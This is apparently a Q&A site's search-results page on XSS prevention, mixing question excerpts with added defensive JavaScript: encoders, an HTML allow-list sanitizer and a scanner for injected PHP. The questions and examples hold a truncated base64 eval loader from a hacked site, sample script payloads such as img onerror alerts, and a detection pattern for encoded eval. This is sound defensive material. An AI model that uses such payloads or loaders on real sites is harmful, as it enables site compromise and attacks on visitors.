Search Results

Search found 497 results on 20 pages for 'xss prevention'.

  • Designing rules to fight smallpox in Civ-style TBS games

    - by Williham Totland
    TL;DR: How do you design a ruleset for a Civ-style TBS game that prevents city smallpox from being a profitable or viable strategy? Long version: Civ-style games are pretty great. Bringing a civilization from cradle to grave is a great endeavor, and practicing diplomacy with hard-line human players is fun and challenging. In theory. In practice, however, many of these games have, especially in multiplayer, exactly one viable strategy: City smallpox, a.k.a. infinite city spread, a.k.a. covering all available space with 1-citizen cities, packed as tight as they will go. I suppose this could count as emergent gameplay, but still; it could hardly be considered to be in the spirit of the class of game. The Civilization series, of course, is stuck in its more or less fixed rule sets, established with Civilization. Yes, there have been major changes in some respects, but the rules pertaining to city building and maintenance have stayed pretty similar. So the question, then: If you build a ruleset for a TBS from the ground up, what rules should be in place to prevent Infinite City Sprawl from being a viable strategy? Or should ICS be a viable strategy?

  • Is it possible to block traffic originating from a specific country?

    - by mickburkejnr
    Hi guys, My personal website is currently getting a lot of spam comments at the moment, and most of them originate from Russia (I've used Google Analytics to identify the traffic, and a lot of the links link to Russian sites). As it's a pain to keep deleting these comments, I would like to ban people from there from commenting on or visiting the website. Is this possible? Also, the website is using WordPress. Many thanks!

  • How to batch remove spamming users and pages they created on MediaWiki?

    - by Problemania
    I'm trying to clean up a MediaWiki instance which has been subjected to spamming and vandalism for a period of time. The current status is that there are a large number of users which only created spam pages but typically did not alter legitimate pages. And there are only <10 users which I know are legitimate users and created a small number of legitimate pages. Abstractly, my idea of fixing the messy situation is to find the complete list of users that are not in that small set of legitimate users, use the RenameUser extension to rename them all to a Spammer user, and use the Nuke extension to mass delete all pages they created. Any practical advice on how to proceed? Since there are hundreds of spammer users, how do I effectively rename them? It seems the Renameuser extension does not support automated batch renaming of users by allowing users to be renamed from a list or file.

  • Why do spammers use CELESTRON NEXTAR 6SE?

    - by fmz
    I am running a website for a volunteer organization that hosts an annual event. There is a form where people can volunteer to bring items for the event. All too frequently I get spam from users across the globe that enter things like this: Country - 1: Australia Material - 1: CELESTRON NEXTAR 6SE Country - 2: Australia Material - 2: C8 Newton Country - 3: Australia Material - 3: ETX 125EC Country - 4: Australia Material - 4: ETX 125EC Country - 5: Australia Material - 5: CELESTRON NEXTAR 6SE I don't really care about the country, but what is it with the telescope stuff? Is there some hidden meaning behind all this or is it some astronomy group that moonlights as spammers?

  • How to allow my Asp.net MVC 3 web app using MathJax to accept user input $x<y>z$ ?

    - by Recycle Bin
    I am developing a mathematics site using Asp.Net MVC 3 + Razor + MathJax. MathJax is a javascript library to render TeX or LaTeX code in the web browser. And TeX or LaTeX code represents mathematics content such as an inline math $y=mx+c$ and a displayed math \[y=mx+c\]. Right now my site can accept input, for example, $x<y$. However it cannot accept $x<y>z$ because the framework regards this input as vulnerable to XSS and XSRF. In short, what should I do to accomplish what I want without opening a security vulnerability?

  • Are these two functions overkill for sanitization?

    - by jpjp
    function sanitizeString($var) {
        $var = stripslashes($var);
        $var = htmlentities($var);
        $var = strip_tags($var);
        return $var;
    }

    function sanitizeMySQL($var) {
        $var = mysql_real_escape_string($var);
        $var = sanitizeString($var);
        return $var;
    }

    I got these two functions from a book and the author says that by using these two, I can be extra safe against XSS (the first function) and SQL injections (2nd func). Are all those necessary? Also for sanitizing, I use prepared statements to prevent SQL injections. I would use them like this:

    $variable = sanitizeString($_POST['user_input']);
    $variable = sanitizeMySQL($_POST['user_input']);
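
Added example, not code from the book or from the post above: the alternative a practitioner would reach for is to keep the stored value raw (prepared statements take care of the SQL side) and encode at each output sink according to its context. Running htmlentities()/strip_tags() on the way in mangles data ("5 < 6" is stored as "5 &lt; 6") and still leaves sinks that are not HTML text, such as a JavaScript string literal, unprotected. The profile page and the hostile name are constructed for the demo; the encoder names are hypothetical.

```javascript
// Added example: context-specific output encoding, shown in JavaScript.
// The stored value is never modified; each sink gets its own encoder.

// HTML text nodes and double-quoted attribute values.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Inside a JavaScript string literal: every character outside [A-Za-z0-9]
// becomes \xHH or \uHHHH, so neither a quote nor "</script>" can end the
// literal or the surrounding <script> block.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// A URL query-parameter value.
function encodeForUrlParam(s) {
  return encodeURIComponent(String(s));
}

// Render from the RAW stored value; note that the same value is emitted
// into four different contexts and needs a different encoder for each.
function renderProfile(rawName) {
  return [
    `<h1>${encodeForHtml(rawName)}</h1>`,
    `<input name="display" value="${encodeForHtml(rawName)}">`,
    `<script>var who = "${encodeForJsString(rawName)}";</script>`,
    `<a href="/search?q=${encodeForUrlParam(rawName)}">find</a>`,
  ].join('\n');
}

// Demo with a constructed hostile display name.
console.log(renderProfile(`O'Reilly <img src=x onerror=alert(1)> "x"</script>`));
```

The point the two book functions miss is that "safe" depends on where the bytes land: the entity encoding that protects an HTML text node does nothing inside a script block, and strip_tags() on input throws away legitimate content without making the value safe for any other sink.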

  • Best practice. Do I save html tags in DB or store the html entity value?

    - by Matt
    Hi Guys, I was wondering which way I should do the following. I am using the TinyMCE WYSIWYG editor, which formats the user's data with the right HTML tags. Now I need to save the data entered into the editor into a database table. Should I encode the HTML tags to their corresponding entities when inserting into the DB, then when I get the data back from the table not have to encode it for XSS purposes, but I'd still have to use eval for the HTML tags to format the text? OR do I save the HTML tags into the database, then when I get the data back from the database encode the HTML tags to their entities, but then as the tags will appear to the user, I'd have to use the eval function to actually format the data as it was entered? My thoughts are with the first option, I just wondered what you guys thought.

  • Duplicate ID/indexes and looping

    - by Justin Alexander
    I realize having two elements in the same html doc with the same ID is wrong, bad, immoral, and will lead to global warming. But... I'm trying to write an XSS widget, so I really have no control over the quality of the parent web page. I loop through document.images to retrieve a list of images on the page. I perform an action on each one.

    for (img in document.images) { ... }

    I've also tried

    for (var i = 0; i < document.images.length; i++) { ... }

    In both cases it allows me to loop through all of the elements, BUT when trying to reference an object with a duplicate ID, I always get the first (in order of the html). When using the debugger in IE8 I'm able to see that both elements ARE listed, but that they both have the same index (in IE the index of document.images is either sequential or matches the image ID). Does anyone have a better solution?

  • Using user editable image URL in application. Security issues.

    - by sharas
    Hi there. I am writing an application where users are required to show their photo, however as my server resources are very limited I can not let them upload it to the server. So I have three major questions:

    1. How to properly validate the photo URL? At least I can validate with a regexp, however I need to check for the file ending:

    validates_format_of :photo_url, :with => URI::regexp(%w(http https))

    2. Security issues? XSS? Even if I validate the picture at the moment of creation, a hacker can replace the image with malicious stuff anytime.

    3. Maybe there are free asset stores with an API?

  • PHP: I got hacked...

    - by jun
    I just checked my site and it suddenly jumps me to this site: xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx

    I found out that the first line of my index.php file looks like this:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/* Snip */"));?>

    How do I stop this? Thanks!

    UPDATE: What kind of attack is this? Is this really XSS? No one really knows my FTP password.
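
Added example, not from the post: a small indicator scan for the shape of the injected line shown above, an eval() wrapped around base64_decode() (sometimes chained with gzinflate() or str_rot13()), which decodes the literal so the payload can be read and reports which line of the file carries it. It is a triage aid for finding every infected file, not a cleaner; the remediation is to restore from a known-good copy and rotate the FTP/hosting credentials. The PHP source and the payload below are constructed for the demo and are not the poster's real payload.

```javascript
// Added example: find eval(<decoder chain>("<literal>")) in PHP source.
// Only literal arguments are decoded; eval(base64_decode($x)) and similar
// variable-fed forms still match and are reported for manual review.

const WRAPPERS = '(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)';
const ENCODED_EVAL = new RegExp(
  'eval\\s*\\(\\s*((?:' + WRAPPERS + '\\s*\\(\\s*)+)["\']([A-Za-z0-9+/=]+)["\']',
  'g'
);

function scanForEncodedEval(source) {
  const hits = [];
  ENCODED_EVAL.lastIndex = 0;
  let m;
  while ((m = ENCODED_EVAL.exec(source)) !== null) {
    const line = source.slice(0, m.index).split('\n').length;
    const chain = m[1].match(/[a-z_0-9]+/g); // outermost wrapper first
    const innermost = chain[chain.length - 1];
    // Only a plain base64 innermost layer can be shown directly.
    const preview = innermost === 'base64_decode'
      ? Buffer.from(m[2], 'base64').toString('latin1').slice(0, 80)
      : '(inner layer is not plain base64; decode by hand)';
    hits.push({ line, chain, preview });
  }
  return hits;
}

// Injected one-liners are typically enormous; flag over-long lines too.
function longLines(source, maxLen = 500) {
  return source.split('\n')
    .map((text, i) => ({ line: i + 1, length: text.length }))
    .filter((l) => l.length > maxLen);
}

// CONSTRUCTED sample: a stand-in loader prepended to an otherwise normal file.
const PAYLOAD = 'if(function_exists("ob_start")){ /* constructed stand-in for the loader */ }';
const SAMPLE_INDEX_PHP = [
  '<?php /**/ eval(base64_decode("' + Buffer.from(PAYLOAD).toString('base64') + '"));?>',
  '<?php',
  'require __DIR__ . "/config.php";',
  '$title = htmlspecialchars($_GET["t"] ?? "home", ENT_QUOTES);',
  'echo "<h1>$title</h1>";',
].join('\n');

console.log(scanForEncodedEval(SAMPLE_INDEX_PHP));
console.log(longLines(SAMPLE_INDEX_PHP, 60));
```

Run the scan over every PHP file in the document root, not just index.php; this kind of injection is usually written into every writable script the attacker could reach, plus a few dropped files of its own.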

  • Security as a Service (SecaaS) for Amazon EC2

    - by Dave
    I'm looking for a security as a service (SecaaS) provider or open source solution for Amazon EC2 instances, however I can't seem to find much on Google or elsewhere so was wondering if anyone knows where I could find this service? Ideally I'm looking for something that offers virtual firewalls, email and web security and virtual spam prevention. If anyone has any information on SecaaS I'd appreciate it. Thanks in advance

  • How to reliably send a request cross domain and cross browser on page unload

    - by Agmin
    I have javascript code that's loaded by 3rd parties. The javascript keeps track of a number of metrics, and when a user exits the page I'd like to send the metrics back to my server. Due to XSS checks in some browsers, like IE, I cannot do a simple jquery.ajax() call. Instead, I'm appending an image src to the page with jquery. Here's the code, cased by browser:

    function record_metrics() {
        // Arbitrary code execution here to set test_url
        $esajquery('#MainDiv').append("<img src='" + test_url + "' />");
    }

    if ($esajquery.browser.msie) {
        window.onbeforeunload = function() {
            record_metrics();
        };
    } else {
        $esajquery(window).unload(function() {
            record_metrics();
        });
    }

    FF aborts the request to "test_url" if I use window.onbeforeunload, and IE8 doesn't work with jquery's unload(). IE8 also fails to work if the arbitrary test_url setting code is too long, although IE8 seems to work fine if the image is immediately appended to the DOM. Is there a better way to solve this issue? Unfortunately this really needs to execute when a user leaves the page.

  • Approaches for cross server content sharing?

    - by Anonymity
    I've currently been tasked with finding the best solution to serving up content on our new site from another one of our other sites. Several approaches suggested to me, that I've looked into, include using SharePoint's Lists Web Service to grab the list through javascript - which results in XSS and is not an option. Another suggestion was to build a server side custom web service and use SharePoint Request Forms to get the information - this is something I've only very briefly looked at. It's been suggested that I try permitting the requesting site in the HTTP headers of the serving site since I have access to both. This ultimately resulted in a semi-working solution that had major security holes. (I had to include username/password in the request to appease AD Authentication). This was done by allowing Access-Control-Allow-Origin: * The most direct approach I could think of was to simply build the webpart in our new environment and have the authors manually update this content the same as they would on the other site. Are any one of the suggestions here more valid than another? Which would be the best approach? Are there other suggestions I may be overlooking? I'm also not sure if web crawling or content scraping really holds water here...

  • Sanitizing user input before adding it to the DOM in Javascript

    - by I GIVE TERRIBLE ADVICE
    I'm writing the JS for a chat application I'm working on in my free time, and I need to have HTML identifiers that change according to user submitted data. This is usually something conceptually shaky enough that I would not even attempt it, but I don't see myself having much of a choice this time. What I need to do then is to escape the HTML id to make sure it won't allow for XSS or breaking HTML. Here's the code:

    var user_id = escape(id);
    var txt = '<div class="chut">' +
        '<div class="log" id="chut_' + user_id + '"></div>' +
        '<textarea id="chut_' + user_id + '_msg"></textarea>' +
        '<label for="chut_' + user_id + '_to">To:</label>' +
        '<input type="text" id="chut_' + user_id + '_to" value="' + user_id + '" readonly="readonly" />' +
        '<input type="submit" id="chut_' + user_id + '_send" value="Message"/>' +
        '</div>';

    What would be the best way to escape id to avoid any kind of problem mentioned above? As you can see, right now I'm using the built-in escape() function, but I'm not sure how good this is supposed to be compared to other alternatives. I'm mostly used to sanitizing input before it goes in a text node, not an id itself.
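
Added example, not the poster's code: the two changes a reviewer would ask for are (1) derive the id suffix from an allow-list so that, whatever the user id contains, the result is safe in an id attribute, a CSS selector and a querySelector() call, and (2) build the widget with DOM APIs instead of string concatenation, so the raw id is assigned as a property and there is no HTML context left to escape for. escape() only percent-encodes and was never designed for either job. Function names are hypothetical; buildWidget assumes a browser `document`.

```javascript
// Added example: allow-list id derivation plus DOM construction.

// Every character outside [A-Za-z0-9] becomes _xHH_ (hex code point). The
// result matches /^[A-Za-z0-9_]*$/. Because "_" itself is encoded, two
// different inputs can never produce the same suffix ("a b" vs "a_b").
function safeIdSuffix(id) {
  return String(id).replace(/[^A-Za-z0-9]/gu, (c) => `_x${c.codePointAt(0).toString(16)}_`);
}

// Inverse mapping, for getting from a DOM id back to the user id.
function decodeIdSuffix(suffix) {
  return suffix.replace(/_x([0-9a-f]+)_/g, (_, h) => String.fromCodePoint(parseInt(h, 16)));
}

function buildWidget(doc, rawUserId) {
  const sfx = safeIdSuffix(rawUserId);

  const wrap = doc.createElement('div');
  wrap.className = 'chut';

  const log = doc.createElement('div');
  log.className = 'log';
  log.id = `chut_${sfx}`;

  const msg = doc.createElement('textarea');
  msg.id = `chut_${sfx}_msg`;

  const label = doc.createElement('label');
  label.htmlFor = `chut_${sfx}_to`;
  label.textContent = 'To:';

  const to = doc.createElement('input');
  to.type = 'text';
  to.id = `chut_${sfx}_to`;
  to.value = rawUserId; // property assignment, not markup: shown verbatim, cannot break out
  to.readOnly = true;

  const send = doc.createElement('input');
  send.type = 'submit';
  send.id = `chut_${sfx}_send`;
  send.value = 'Message';

  wrap.append(log, msg, label, to, send);
  return wrap;
}

console.log(safeIdSuffix('<img onerror=x>')); // _x3c_img_x20_onerror_x3d_x_x3e_
if (typeof document !== 'undefined') {
  document.body.append(buildWidget(document, '<img onerror=x>'));
}
```

If the user id must also be displayed, it is the raw value that goes into textContent or .value, never the encoded suffix; the suffix exists only to key DOM elements.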

  • How to better (unambiguously) use the term CAPTCHA and various types of interactions?

    - by vgv8
    I am working on a survey of the state of the art and trends in spam prevention techniques. I observe that non-intrusive, transparent-to-visitor spam prevention techniques (like context-based filtering or honey traps) are frequently called non-captcha. Is it a correct understanding of the term CAPTCHA, which is a "type of challenge-response [ 2 ] test used in computing to ensure that the response is not generated by a computer" [ 1 ], and challenge-response does not seem to imply obligatory human involvement. So, which understanding (definition) of the term and classification had I better stick with? How would I better call a CAPTCHA without direct human interaction in order to avoid ambiguity and confusion of terms? How would I better (succinctly and unambiguously) coin the term for captchas requiring human interaction but without typing into a textbox? How would I better (succinctly and unambiguously) coin the terms to mark the difference between human interaction with images (playing, drag&dropping, rearranging, clicking on images) vs. just recognizing them (and then typing the answer into a textbox without interaction with images)? PS. The problem is that recognition of a wiggled word in an image or typing the answer to a question is also interaction, and when I start to use the terms "interaction", "interactive", "captcha", "protection", "non-captcha", "non-interactive", "static", "dynamic", "visible", "hidden" the terms overlap ambiguously with one another (especially because the definitions or their actual practice of usage are vague or contradictory). [ 1 ] http://en.wikipedia.org/wiki/CAPTCHA

  • use jsonp to get xml cross domain

    - by lmkk
    I am trying to read xml into a webpage from another server, and I assume that my problem is the Same-Origin Policy, and therefore a cross domain problem. I have done a bit of googling and it seems that jsonp is the way forward. Based on some examples I found here on stackoverflow and on other sites, this is what I have, and it does not "hit" the server with the xml. I can view the xml in a browser.

    $(document).ready(function() {
        $.ajax({
            type: 'GET',
            dataType: 'jsonp',
            url: 'http://192.168.0.106:8111/getconfiguration?',
            success: function(xml) {
                // do stuff with received xml
            }
        });
    });

    Any suggestions? Please keep in mind that I am a newbie with regards to JS / JQuery ;o)

  • How to Force a Method Call on a Property or Method of an Object in PHP?

    - by Noah Goodrich
    In my View (using Zend_View so the view is an object), I make calls to object properties and methods to populate the template like so:

    <?= $this->user->name ?> <br/>                 // Outputs John Doe
    <?= $this->user->getCompany()->name ?> <br/>   // Outputs Acme
    <?= $this->method() ?>                         // Outputs foobar

    If I make it so that all property requests (like for 'user') go through __get(), is there any way that I can catch the subsequent calls so that I can force a method call on the final outputted value? For example so that I could do automatic escaping of output. As I see it right now, I either have to escape the input as it goes into the database or use compiled templates like Smarty does, or switch to assigning every variable to the View object so that it has direct control to force escaping before outputting the data.
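
Added example, not from the post: the same idea in JavaScript, where a Proxy plays the role of PHP's __get(). Each property read returns strings HTML-encoded, nested objects wrapped again, and methods wrapped so that whatever they return is wrapped too; the template therefore gets encoded values by default and has to ask for raw() explicitly for the rare trusted-HTML case. The view data is constructed; function names are hypothetical.

```javascript
// Added example: escape-on-read through a Proxy.
const RAW = Symbol('raw');

// HTML text/attribute context only; a JS-string or URL sink needs its own encoder.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function autoEscape(value) {
  if (typeof value === 'string') return escapeHtml(value);
  if (value === null || typeof value !== 'object') return value; // numbers, booleans, undefined
  return new Proxy(value, {
    get(target, prop) {
      if (prop === RAW) return target;
      const v = target[prop];
      // Methods run against the unwrapped object (so internal state still
      // works) and their return value is wrapped on the way out.
      if (typeof v === 'function') return (...args) => autoEscape(v.apply(target, args));
      return autoEscape(v);
    },
  });
}

// Opt-out for a value that is already trusted HTML.
function raw(wrapped) {
  return (wrapped !== null && typeof wrapped === 'object' && wrapped[RAW]) || wrapped;
}

// Constructed view model mirroring the Zend_View snippet above.
const view = autoEscape({
  user: {
    name: 'John <b>Doe</b>',
    getCompany() { return { name: 'Acme & Co' }; },
  },
  method() { return '<i>foobar</i>'; },
});

console.log(view.user.name);              // John &lt;b&gt;Doe&lt;/b&gt;
console.log(view.user.getCompany().name); // Acme &amp; Co
console.log(view.method());               // &lt;i&gt;foobar&lt;/i&gt;
console.log(raw(view.user).name);         // John <b>Doe</b>
```

The trade-off is the one the post already hints at: encoding on read fixes the HTML-body context only, so the template still has to use a different encoder for attributes built without quotes, script blocks and URLs, and anything passed through raw() is back to being the template author's responsibility.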

  • How does Google Friend Connect accomplish cross domain communication without needing to upload a file to the client domain?

    - by mboyle
    Previously, Google's Friend Connect required users to upload a couple of files to their websites to enable cross domain communication and Facebook Connect still requires you to upload a single file to enabled it. Now, Friend Connect doesn't require any file upload... I was wondering how they were able to accomplish this. Reference: http://www.techcrunch.com/2009/10/02/easy-does-it-google-friend-connect-one-ups-facebook-connects-install-wizard/

  • Vote on Pros and Cons of Java HTML to XML cleaners

    - by George Bailey
    I am looking to allow HTML emails (and other HTML uploads) without letting in scripts and stuff. I plan to have a white list of safe tags and attributes as well as a whitelist of CSS tags and value regexes (to prevent automatic return receipt). I asked a question: Parse a badly formatted XML document (like an HTML file) I found there are many many ways to do this. Some systems have built in sanitizers (which I don't care so much about). This page is a very nice listing page but I get kinda lost http://java-source.net/open-source/html-parsers It is very important that the parsers never throw an exception. There should always be best guess results to the parse/clean. It is also very important that the result is valid XML that can be traversed in Java. I posted some product information and said Community Wiki. Please post any other product suggestions you like and say Community Wiki so they can be voted on. Also any comments or wiki edits on what part of a certain product is better and what is not would be greatly appreciated. (for example,, speed vs accuracy..) It seems that we will go with either jsoup (seems more active and up to date) or TagSoup (compatible with JDK4 and been around awhile). A +1 for any of these products would be if they could convert all style sheets into inline style on the elements.

  • Best Practice: Legitimate Cross-Site Scripting

    - by Ryan
    While cross-site scripting is generally regarded as negative, I've run into several situations where it's necessary. I was recently working within the confines of a very limiting content management system. I needed to include database code within the page, but the hosting server didn't have anything usable available. I set up a couple of barebones scripts on my own server, originally thinking that I could use AJAX to import the contents of my scripts directly into the template of the CMS (thus retaining dynamic images, menu items, CSS, etc.). I was wrong. Due to the limitations of XMLHttpRequest objects, it's not possible to grab content from a different domain. So I thought "iFrame" - even though I'm not a fan of frames, I thought that I could create a frame that matched the width and height of the content, so that it would appear native. Again, I was blocked by cross-site scripting "protections." While I could indeed load a remote file into the iFrame, I couldn't execute JavaScript to modify its size on either the host page or inside the loaded page. In this particular scenario, I wasn't able to point a subdomain to my server. I also couldn't create a script on the CMS server that could proxy content from my server, so my last thought was to use a remote JavaScript. A remote JavaScript works. It breaks when the user has JavaScript disabled, which is a downside; but it works. The "problem" I was having with using a remote JavaScript was that I had to use the JS function document.write() to output any content. Any output that isn't JS causes script errors. In addition to using document.write() for every line, you also have to ensure that the content is escaped - or else you end up with more script errors. My solution was as follows: My script received a GET parameter ("page") and then looked for the file ({$page}.php), and read the contents into a variable. However, I had to use awkward buffering techniques in order to actually execute the included scripts (for things like database interaction), then strip the final content of all line break characters ("\n") followed by escaping all required characters. The end result is that my original script (which outputs JavaScript) accesses seemingly "standard" scripts on my server and converts their standard output to JavaScript for displaying within the CMS template. While this solution works, it seems like there may be a better way to accomplish the same thing. What is the best way to make cross-site scripting work specifically for the purpose of including content from a completely different domain?

  • Cleaning all inline events from HTML tags

    - by Itay Moav
    For HTML input, I want to neutralize all HTML elements that have inline js (onclick="..", onmouseout=".." etc). I am thinking, isn't it enough to encode the following chars? =,(,) So onclick="location.href='ggg.com'" will become onclick%3D"location.href%3D'ggg.com'" What am I missing here? Edit: I do need to accept active HTML (I can't escape it all or entities is it).
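
Added example serving three of the posts above (storing TinyMCE output, the HTML-cleaner survey, and neutralizing inline event handlers); it is not code from any of them. Rich text that has to keep its tags cannot simply be entity-encoded on output, so the practitioner's answer is an allow-list: parse the HTML, keep only known tags and attributes, and rebuild each tag from the parsed pieces so nothing the parser did not understand reaches the output. Encoding "=", "(" and ")" as proposed above does not work, because the browser decodes entities inside attribute values and a handler needs none of those characters anyway (onload="alert`1`" runs). With this in place the storage question answers itself: store the raw editor output and sanitize at render time (or at save time, and again on render whenever the allow-list changes). The allow-list below is an illustrative assumption, and the hostile input is constructed.

```javascript
// Added example: an allow-list HTML sanitizer that rebuilds tags.

const ALLOWED = new Map(Object.entries({
  p: [], br: [], b: [], i: [], em: [], strong: [], ul: [], ol: [], li: [],
  blockquote: [], code: [], pre: [],
  a: ['href', 'title'],
  img: ['src', 'alt', 'width', 'height'],
}));
const VOID_TAGS = new Set(['br', 'img']);

function encodeText(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Resolve numeric entities and ignore control/space characters before
// checking the scheme, so "java&#x09;script:" is seen for what it is.
// Returns null when the URL must be dropped.
function safeUrl(value) {
  const fromCp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '\uFFFD');
  const decoded = value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCp(parseInt(d, 10)));
  const probe = decoded.replace(/[\u0000-\u0020]/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(probe);
  if (scheme && !/^(https?|mailto)$/i.test(scheme[1])) return null;
  return decoded;
}

function sanitizeHtml(input) {
  const out = [];
  const open = []; // open element names; anything left is closed at the end
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)((?:[^>"']|"[^"]*"|'[^']*')*)>/g;
  const attrRe = /([a-zA-Z][a-zA-Z0-9:-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let last = 0;
  let m;
  while ((m = tagRe.exec(input)) !== null) {
    out.push(encodeText(input.slice(last, m.index))); // text between tags is always encoded
    last = tagRe.lastIndex;
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (!ALLOWED.has(name)) continue; // script, style, iframe, svg, ...: dropped, content kept as text
    if (closing) {
      const idx = open.lastIndexOf(name);
      if (VOID_TAGS.has(name) || idx === -1) continue; // stray close tag
      while (open.length > idx) out.push(`</${open.pop()}>`);
      continue;
    }
    const attrs = [];
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(m[3])) !== null) {
      const attrName = a[1].toLowerCase();
      if (!ALLOWED.get(name).includes(attrName)) continue; // on*, style, srcdoc, ...: dropped
      let v = a[2] ?? a[3] ?? a[4] ?? '';
      if (attrName === 'href' || attrName === 'src') {
        v = safeUrl(v);
        if (v === null) continue;
      }
      attrs.push(` ${attrName}="${encodeText(v)}"`);
    }
    out.push(`<${name}${attrs.join('')}>`);
    if (!VOID_TAGS.has(name)) open.push(name);
  }
  out.push(encodeText(input.slice(last)));
  while (open.length) out.push(`</${open.pop()}>`);
  return out.join('');
}

// Constructed hostile editor output.
console.log(sanitizeHtml(
  '<p onclick="steal()">Hi <b>there</b></p>' +
  '<img src="x" onerror="alert(1)">' +
  '<a href="java&#x09;script:alert(1)">click</a>' +
  '<script>alert(2)</script> 1 < 2'
));
```

Two design choices matter more than the tag list: tags are re-emitted from the parsed name and attributes rather than copied from the input, so malformed markup the regex did not fully understand degrades to encoded text instead of passing through; and URL attributes are checked after decoding numeric entities, which is where the "javascript:" obfuscations that defeat string matching live. For production use a maintained library with the same allow-list design, but the properties to demand of it are the ones shown here.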

  • PHP Form Security With Referer

    - by Jascha
    I'm putting together a site that will make itself available for user input. I was wondering if writing a function like:

    if (getenv("HTTP_REFERER") != 'http://www.myURL.com/submitArea') {
        die('don\'t be a jerk, ruin your own site');
    } else {
        // continue with form processing
    }

    is enough to prevent cross site form submissions.

  • prevent javascript in the WMD editor's preview box

    - by Justin Grant
    There are many SO questions (e.g. here and here) about how to do server-side scrubbing of Markdown produced by the WMD editor to ensure the HTML generated doesn't contain malicious script, like this: <img onload="alert('haha');" src="http://www.google.com/intl/en_ALL/images/srpr/logo1w.png" /> Unfortunately, this still allows script to show up in the WMD client's preview box. I doubt this is a big deal since if you're scrubbing the HTML on the server, an attacker can't save the bad HTML so no one else will be able to see it later and have their cookies stolen or sessions hijacked by the bad script. But it's still kinda odd to allow an attacker to run any script in the context of your site, and it's probably a bad idea to allow the client preview window to allow different HTML than your server will allow. StackOverflow has clearly plugged this hole. How did they do it? [NOTE: I already figured this out but it required some tricky javascript debugging, so I'm answering my own question here to help others who may want to do the same thing]
